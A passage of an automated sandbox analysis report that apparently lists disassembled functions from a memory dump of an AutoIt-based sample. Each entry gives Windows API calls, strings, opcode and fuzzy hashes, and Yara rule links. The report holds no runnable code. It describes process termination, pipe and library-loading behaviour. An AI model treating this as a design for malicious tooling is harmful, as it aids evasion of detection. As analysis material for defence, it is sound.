                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Virtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4278518827-0
                                                                                                          • Opcode ID: b016447f9620b85439d9d29d63a2bf78cdc0e4e82a2f6ebc865670ed4bfeb9b4
                                                                                                          • Instruction ID: 14fab7df263675a5797b96535fad26af5ad330b6da0e59ecb752a3c64f2367ae
                                                                                                          • Opcode Fuzzy Hash: b016447f9620b85439d9d29d63a2bf78cdc0e4e82a2f6ebc865670ed4bfeb9b4
                                                                                                          • Instruction Fuzzy Hash: C3016CB09027597DE3008F5A8C85B52FFA8FF59354F04411BA15C4B941C7F5A868CBE5
                                                                                                          Function 00EA59A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00EA59B4
                                                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00EA59CA
                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00EA59D9
                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EA59E8
                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EA59F2
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EA59F9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 839392675-0
                                                                                                          • Opcode ID: 4a598efe76262f8af9393b4afef1200130c93609cba1d9d83b055224b057524a
                                                                                                          • Instruction ID: cb790e7d883f1fc2db69cd6d6003b228aad09a9a939f40f33bb94a7566f15697
                                                                                                          • Opcode Fuzzy Hash: 4a598efe76262f8af9393b4afef1200130c93609cba1d9d83b055224b057524a
                                                                                                          • Instruction Fuzzy Hash: D8F01D32242158BFE7215B93AC0DFEF7B7CEBCBB11F04015AFA15A1050D7A05A1586B5
                                                                                                          Function 00EA77EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 00EA77FE
                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00E4C2B6,?,?), ref: 00EA780F
                                                                                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00E4C2B6,?,?), ref: 00EA781C
                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E4C2B6,?,?), ref: 00EA7829
                                                                                                            • Part of subcall function 00EA71F0: CloseHandle.KERNEL32(00000000,?,00EA7836,?,00E4C2B6,?,?), ref: 00EA71FA
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EA783C
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00E4C2B6,?,?), ref: 00EA7843
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 3495660284-0
                                                                                                          • Opcode ID: 71c9dd50b19dcabed36788d9cf118fbe7cf481cc5117915d5220573a72d2955b
                                                                                                          • Instruction ID: 004d8204dabb2844a8e0a972c95a36c810d4262578ae341e63f4f7fa6c0bf97a
                                                                                                          • Opcode Fuzzy Hash: 71c9dd50b19dcabed36788d9cf118fbe7cf481cc5117915d5220573a72d2955b
                                                                                                          • Instruction Fuzzy Hash: EDF05E32147212AFD7112B65FC8CBAB7769FF4A302F581422F102B50B2CBB56849CB60
                                                                                                          Function 00E9954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E99555
                                                                                                          • UnloadUserProfile.USERENV(?,?), ref: 00E99561
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00E9956A
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00E99572
                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00E9957B
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00E99582
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 146765662-0
                                                                                                          • Opcode ID: 04bff89d7e42bcedcdd9810dc2a1c7d51cfb4f89294651e7c5c4236831abfda7
                                                                                                          • Instruction ID: eaf97eab9aa6fb62634ddc9cdaa76b248c9858168868349f052f154fdb3becd5
                                                                                                          • Opcode Fuzzy Hash: 04bff89d7e42bcedcdd9810dc2a1c7d51cfb4f89294651e7c5c4236831abfda7
                                                                                                          • Instruction Fuzzy Hash: C9E0C236106101BFDA012BE2FC0CA5ABB29FB89722B584222F215A1070CB32A468DB50
                                                                                                          Function 00EB8CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 00EB8CFD
                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00EB8E0C
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00EB8F84
                                                                                                            • Part of subcall function 00EA7B1D: VariantInit.OLEAUT32(00000000), ref: 00EA7B5D
                                                                                                            • Part of subcall function 00EA7B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00EA7B66
                                                                                                            • Part of subcall function 00EA7B1D: VariantClear.OLEAUT32(00000000), ref: 00EA7B72
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                          • API String ID: 4237274167-1221869570
                                                                                                          • Opcode ID: 82aad3103196e9a958d2e5d2d31e9753698c9261ae66fab43f1ab952a12acab7
                                                                                                          • Instruction ID: 68fe8cfb48d2b31df18dcc44a5e5dcd9da4d72e64d5f09342f03227e6290c961
                                                                                                          • Opcode Fuzzy Hash: 82aad3103196e9a958d2e5d2d31e9753698c9261ae66fab43f1ab952a12acab7
                                                                                                          • Instruction Fuzzy Hash: E69190746043019FC700DF24C5809ABB7F9EF89354F14996EF999AB3A1DB31E905CB51
                                                                                                          Function 00EA323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E5436A: _wcscpy.LIBCMT ref: 00E5438D
                                                                                                          • _memset.LIBCMT ref: 00EA332E
                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EA335D
                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EA3410
                                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00EA343E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 4152858687-4108050209
                                                                                                          • Opcode ID: f063da0a3c2c51d429a23c8f35709821edcd311d6935e1bac94935b042a36d1a
                                                                                                          • Instruction ID: 5a873a7d8621f78346d19940b93145c3a8a0d7a1156c28d52c114566ca4e85e7
                                                                                                          • Opcode Fuzzy Hash: f063da0a3c2c51d429a23c8f35709821edcd311d6935e1bac94935b042a36d1a
                                                                                                          • Instruction Fuzzy Hash: E251D4316083009BD7159E38D84576BBBE4AF4E358F14292DF8A1BB1E1DB20EE48C752
                                                                                                          Function 00EA2EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00EA2F67
                                                                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00EA2F83
                                                                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00EA2FC9
                                                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F07890,00000000), ref: 00EA3012
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Delete$InfoItem_memset
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1173514356-4108050209
                                                                                                          • Opcode ID: 4e535f772036f2b255908d5ef90e7cf7c008a5c944a43afbe7b9bd6e22bca41f
                                                                                                          • Instruction ID: 161a5b47102dee38427758318bfe7d357ad47dfebd0832daecc3e2c3f76b4b7a
                                                                                                          • Opcode Fuzzy Hash: 4e535f772036f2b255908d5ef90e7cf7c008a5c944a43afbe7b9bd6e22bca41f
                                                                                                          • Instruction Fuzzy Hash: 8341B1312043419FD720DF28D884B5ABBE4AF8A314F145A1EF966BB291D770FA05CB66
                                                                                                          Function 00E99A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                            • Part of subcall function 00E9B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00E9B7BD
                                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E99ACC
                                                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E99ADF
                                                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E99B0F
                                                                                                            • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$_memmove$ClassName
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 365058703-1403004172
                                                                                                          • Opcode ID: 9f34502863ea5c4468a8941ea2519b323cc4e574305560aa23dffee8185d8c70
                                                                                                          • Instruction ID: 1105da27cc35dface7e07aa9e156c0cfd451c4a05469b6f538a3bb34b0e8d7e0
                                                                                                          • Opcode Fuzzy Hash: 9f34502863ea5c4468a8941ea2519b323cc4e574305560aa23dffee8185d8c70
                                                                                                          • Instruction Fuzzy Hash: 6421F6719411087EDF14EBA4EC46EFEB7B8DF91350F14621AFC25B72D2EB3949099620
                                                                                                          Function 00EC6A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E42111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E4214F
                                                                                                            • Part of subcall function 00E42111: GetStockObject.GDI32(00000011), ref: 00E42163
                                                                                                            • Part of subcall function 00E42111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E4216D
                                                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EC6A86
                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 00EC6A8D
                                                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EC6AA2
                                                                                                          • DestroyWindow.USER32(?), ref: 00EC6AAA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                          • String ID: SysAnimate32
                                                                                                          • API String ID: 4146253029-1011021900
                                                                                                          • Opcode ID: c03a380bea0ba6bb329c18aa4994f2005a32575d22d1ed0ad9c12e4eab8007dd
                                                                                                          • Instruction ID: 07af3a3af29e41a6b9bc5b6d0a5650c7a8a60ddae5829a3d43df1dd32de82e8b
                                                                                                          • Opcode Fuzzy Hash: c03a380bea0ba6bb329c18aa4994f2005a32575d22d1ed0ad9c12e4eab8007dd
                                                                                                          • Instruction Fuzzy Hash: EC218B71200209AFEF108E649D80FBB77ADEB99368F10A61DFA50B2190D332DC529760
                                                                                                          Function 00EA7357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00EA7377
                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EA73AA
                                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00EA73BC
                                                                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00EA73F6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHandle$FilePipe
                                                                                                          • String ID: nul
                                                                                                          • API String ID: 4209266947-2873401336
                                                                                                          • Opcode ID: 63b21de74f24c07d04dee1b363c0d5ec896834f5e5c85400ff4e5bba4d90427d
                                                                                                          • Instruction ID: 93cb03519b017b6c72d8abac6b1c5c193d7f2f8cc870426ae11a6d1d0cfb5a8c
                                                                                                          • Opcode Fuzzy Hash: 63b21de74f24c07d04dee1b363c0d5ec896834f5e5c85400ff4e5bba4d90427d
                                                                                                          • Instruction Fuzzy Hash: B82160705042069BDF20CF65EC05A9A7BE4EF4A724F215A19FCE1FB2E1D770A854DB50
                                                                                                          Function 00EA7425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00EA7444
                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EA7476
                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00EA7487
                                                                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00EA74C1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHandle$FilePipe
                                                                                                          • String ID: nul
                                                                                                          • API String ID: 4209266947-2873401336
                                                                                                          • Opcode ID: 39854a89cc38748a8aadd60f314f08576cb20832b9518c66adfdcad32a9b1db7
                                                                                                          • Instruction ID: 3730cccb17a73e30ab75a05bba354956ccc4eb52bb5e6adaa03c227943ba3c62
                                                                                                          • Opcode Fuzzy Hash: 39854a89cc38748a8aadd60f314f08576cb20832b9518c66adfdcad32a9b1db7
                                                                                                          • Instruction Fuzzy Hash: 6F21A1716082059BDB20DF699C44B9A7BE8AF5E724F201A19F9F0FB2D0D770AC44C760
                                                                                                          Function 00EAB283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00EAB297
                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00EAB2EB
                                                                                                          • __swprintf.LIBCMT ref: 00EAB304
                                                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00ED0980), ref: 00EAB342
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                          • String ID: %lu
                                                                                                          • API String ID: 3164766367-685833217
                                                                                                          • Opcode ID: 237a8608ae876aeaaf629086053452182beefe5a384b33c6fd241c17293504ba
                                                                                                          • Instruction ID: 2f3b8c7bc4b402daa2c8377909e4b7c349e458e9c442c8c0fcc5ece698bcabf7
                                                                                                          • Opcode Fuzzy Hash: 237a8608ae876aeaaf629086053452182beefe5a384b33c6fd241c17293504ba
                                                                                                          • Instruction Fuzzy Hash: 26215E70A00208AFCB10DFA5D845EAEB7F8EF89704F144069F905AB292DB71EA45CB61
                                                                                                          Function 00E9AC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
                                                                                                            • Part of subcall function 00E9AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E9AA6F
                                                                                                            • Part of subcall function 00E9AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E9AA82
                                                                                                            • Part of subcall function 00E9AA52: GetCurrentThreadId.KERNEL32 ref: 00E9AA89
                                                                                                            • Part of subcall function 00E9AA52: AttachThreadInput.USER32(00000000), ref: 00E9AA90
                                                                                                          • GetFocus.USER32 ref: 00E9AC2A
                                                                                                            • Part of subcall function 00E9AA9B: GetParent.USER32(?), ref: 00E9AAA9
                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00E9AC73
                                                                                                          • EnumChildWindows.USER32(?,00E9ACEB), ref: 00E9AC9B
                                                                                                          • __swprintf.LIBCMT ref: 00E9ACB5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                          • String ID: %s%d
                                                                                                          • API String ID: 1941087503-1110647743
                                                                                                          • Opcode ID: 6abf27d621f88ddaad1b96840aa168c574934d1f2cccaeff4cf28bec9e00962b
                                                                                                          • Instruction ID: 9b02f1bc4f66be75ec3e64c1ac0285ff46f64e060e07c30976743ac9186a52a6
                                                                                                          • Opcode Fuzzy Hash: 6abf27d621f88ddaad1b96840aa168c574934d1f2cccaeff4cf28bec9e00962b
                                                                                                          • Instruction Fuzzy Hash: 4E11A275600205ABDF11BFA0DD85FEE77ACEF84710F0860B5FE18BA142DA7059499BB2
                                                                                                          Function 00EA22E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00EA2318
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
